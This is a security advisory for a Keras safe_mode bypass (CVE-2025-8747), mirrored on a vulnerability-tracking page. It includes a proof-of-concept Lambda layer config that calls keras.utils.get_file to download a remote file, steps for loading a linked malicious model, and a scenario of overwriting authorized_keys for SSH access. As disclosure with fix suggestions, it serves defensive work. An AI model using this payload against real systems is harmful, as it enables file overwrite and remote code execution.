ghsa-c9rc-mg46-23w3
Vulnerability from github
Published
2025-08-12 19:33
Modified
2025-08-12 19:33
Summary
Keras vulnerable to CVE-2025-1550 bypass via reuse of internal functionality
Details

Summary

It is possible to bypass the mitigation introduced in response to CVE-2025-1550, when an untrusted Keras v3 model is loaded, even when “safe_mode” is enabled, by crafting malicious arguments to built-in Keras modules.

The vulnerability is exploitable on the default configuration and does not depend on user input (just requires an untrusted model to be loaded).

Impact

| Type | Vector |Impact| | -------- | ------- | ------- | |Unsafe deserialization |Client-Side (when loading untrusted model)|Arbitrary file overwrite. Can lead to Arbitrary code execution in many cases.|

Details

Keras’ safe_mode flag is designed to disallow unsafe lambda deserialization - specifically by rejecting any arbitrary embedded Python code, marked by the “lambda” class name. https://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py#L641 -

if config["class_name"] == "__lambda__": if safe_mode: raise ValueError( "Requested the deserialization of a `lambda` object. " "This carries a potential risk of arbitrary code execution " "and thus it is disallowed by default. If you trust the " "source of the saved model, you can pass `safe_mode=False` to " "the loading function in order to allow `lambda` loading, " "or call `keras.config.enable_unsafe_deserialization()`." )

A fix to the vulnerability, allowing deserialization of the object only from internal Keras modules, was introduced in the commit bb340d6780fdd6e115f2f4f78d8dbe374971c930.

package = module.split(".", maxsplit=1)[0] if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:

However, it is still possible to exploit model loading, for example by reusing the internal Keras function keras.utils.get_file, and download remote files to an attacker-controlled location. This allows for arbitrary file overwrite which in many cases could also lead to remote code execution. For example, an attacker would be able to download a malicious authorized_keys file into the user’s SSH folder, giving the attacker full SSH access to the victim’s machine. Since the model does not contain arbitrary Python code, this scenario will not be blocked by “safe_mode”. It will bypass the latest fix since it uses a function from one of the approved modules (keras).

Example

The following truncated config.json will cause a remote file download from https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js to the local /tmp folder, by sending arbitrary arguments to Keras’ builtin function keras.utils.get_file() -

{ "class_name": "Lambda", "config": { "arguments": { "origin": "https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js", "cache_dir":"/tmp", "cache_subdir":"", "force_download": true}, "function": { "class_name": "function", "config": "get_file", "module": "keras.utils" } },

PoC

  1. Download malicious_model_download.keras to a local directory

  2. Load the model -

from keras.models import load_model model = load_model("malicious_model_download.keras", safe_mode=True)

  1. Observe that a new file index.js was created in the /tmp directory

Fix suggestions

  1. Add an additional flag block_all_lambda that allows users to completely disallow loading models with a Lambda layer.
  2. Audit the keras, keras_hub, keras_cv, keras_nlp modules and remove/block all “gadget functions” which could be used by malicious ML models.
  3. Add an additional flag lambda_whitelist_functions that allows users to specify a list of functions that are allowed to be invoked by a Lambda layer

Credit

The vulnerability was discovered by Andrey Polkovnichenko of the JFrog Vulnerability Research

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-8747"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-12T19:33:07Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nIt is possible to bypass the mitigation introduced in response to [CVE-2025-1550](https://github.com/keras-team/keras/security/advisories/GHSA-48g7-3x6r-xfhp), when an untrusted Keras v3 model is loaded, even when \u201csafe_mode\u201d is enabled, by crafting malicious arguments to built-in Keras modules.\n\nThe vulnerability is exploitable on the default configuration and does not depend on user input (just requires an untrusted model to be loaded).\n\n### Impact\n\n| Type   | Vector   |Impact|\n| -------- | ------- | ------- |\n|Unsafe deserialization |Client-Side (when loading untrusted model)|Arbitrary file overwrite. Can lead to Arbitrary code execution in many cases.|\n\n\n### Details\n\nKeras\u2019 [safe_mode](https://www.tensorflow.org/api_docs/python/tf/keras/models/load_model) flag is designed to disallow unsafe lambda deserialization - specifically by rejecting any arbitrary embedded Python code, marked by the \u201c__lambda__\u201d class name.\nhttps://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py#L641 -\n\n```\nif config[\"class_name\"] == \"__lambda__\":\n        if safe_mode:\n            raise ValueError(\n                \"Requested the deserialization of a `lambda` object. \"\n                \"This carries a potential risk of arbitrary code execution \"\n                \"and thus it is disallowed by default. If you trust the \"\n                \"source of the saved model, you can pass `safe_mode=False` to \"\n                \"the loading function in order to allow `lambda` loading, \"\n                \"or call `keras.config.enable_unsafe_deserialization()`.\"\n            )\n```\n\nA fix to the vulnerability, allowing deserialization of the object only from internal Keras modules, was introduced in the commit [bb340d6780fdd6e115f2f4f78d8dbe374971c930](https://github.com/keras-team/keras/commit/bb340d6780fdd6e115f2f4f78d8dbe374971c930). \n\n```\npackage = module.split(\".\", maxsplit=1)[0]\nif package in {\"keras\", \"keras_hub\", \"keras_cv\", \"keras_nlp\"}:\n```\n\nHowever, it is still possible to exploit model loading, for example by reusing the internal Keras function `keras.utils.get_file`, and download remote files to an attacker-controlled location.\nThis allows for arbitrary file overwrite which in many cases could also lead to remote code execution. For example, an attacker would be able to download a malicious `authorized_keys` file into the user\u2019s SSH folder, giving the attacker full SSH access to the victim\u2019s machine.\nSince the model does not contain arbitrary Python code, this scenario will not be blocked by \u201csafe_mode\u201d. It will bypass the latest fix since it uses a function from one of the approved modules (`keras`).\n\n#### Example \nThe following truncated `config.json` will cause a remote file download from https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js to the local `/tmp` folder, by sending arbitrary arguments to Keras\u2019 builtin function `keras.utils.get_file()` -\n\n```\n           {\n                \"class_name\": \"Lambda\",\n                \"config\": {\n                    \"arguments\": {\n                        \"origin\": \"https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js\",\n                        \"cache_dir\":\"/tmp\",\n                        \"cache_subdir\":\"\",\n                        \"force_download\": true},\n                    \"function\": {\n                        \"class_name\": \"function\",\n                        \"config\": \"get_file\",\n                        \"module\": \"keras.utils\"\n                    }\n                },\n ```\n\n\n### PoC\n\n1. Download [malicious_model_download.keras](https://drive.google.com/file/d/1gS2I6VTTRUwUq8gBoMmvTGaN0SX1Vr8F/view?usp=drive_link) to a local directory\n\n2. Load the model -\n\n```\nfrom keras.models import load_model\nmodel = load_model(\"malicious_model_download.keras\", safe_mode=True)\n```\n\n3. Observe that a new file `index.js` was created in the `/tmp` directory \n\n### Fix suggestions\n1. Add an additional flag `block_all_lambda` that allows users to completely disallow loading models with a Lambda layer.\n1. Audit the `keras`, `keras_hub`, `keras_cv`, `keras_nlp` modules and remove/block all \u201cgadget functions\u201d which could be used by malicious ML models.\n1. Add an additional flag `lambda_whitelist_functions` that allows users to specify a list of functions that are allowed to be invoked by a Lambda layer\n\n### Credit \nThe vulnerability was discovered by Andrey Polkovnichenko of the JFrog Vulnerability Research",
  "id": "GHSA-c9rc-mg46-23w3",
  "modified": "2025-08-12T19:33:07Z",
  "published": "2025-08-12T19:33:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-c9rc-mg46-23w3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8747"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/21429"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/commit/713172ab56b864e59e2aa79b1a51b0e728bba858"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    },
    {
      "type": "WEB",
      "url": "https://jfrog.com/blog/keras-safe_mode-bypass-vulnerability"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Keras vulnerable to CVE-2025-1550 bypass via reuse of internal functionality"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…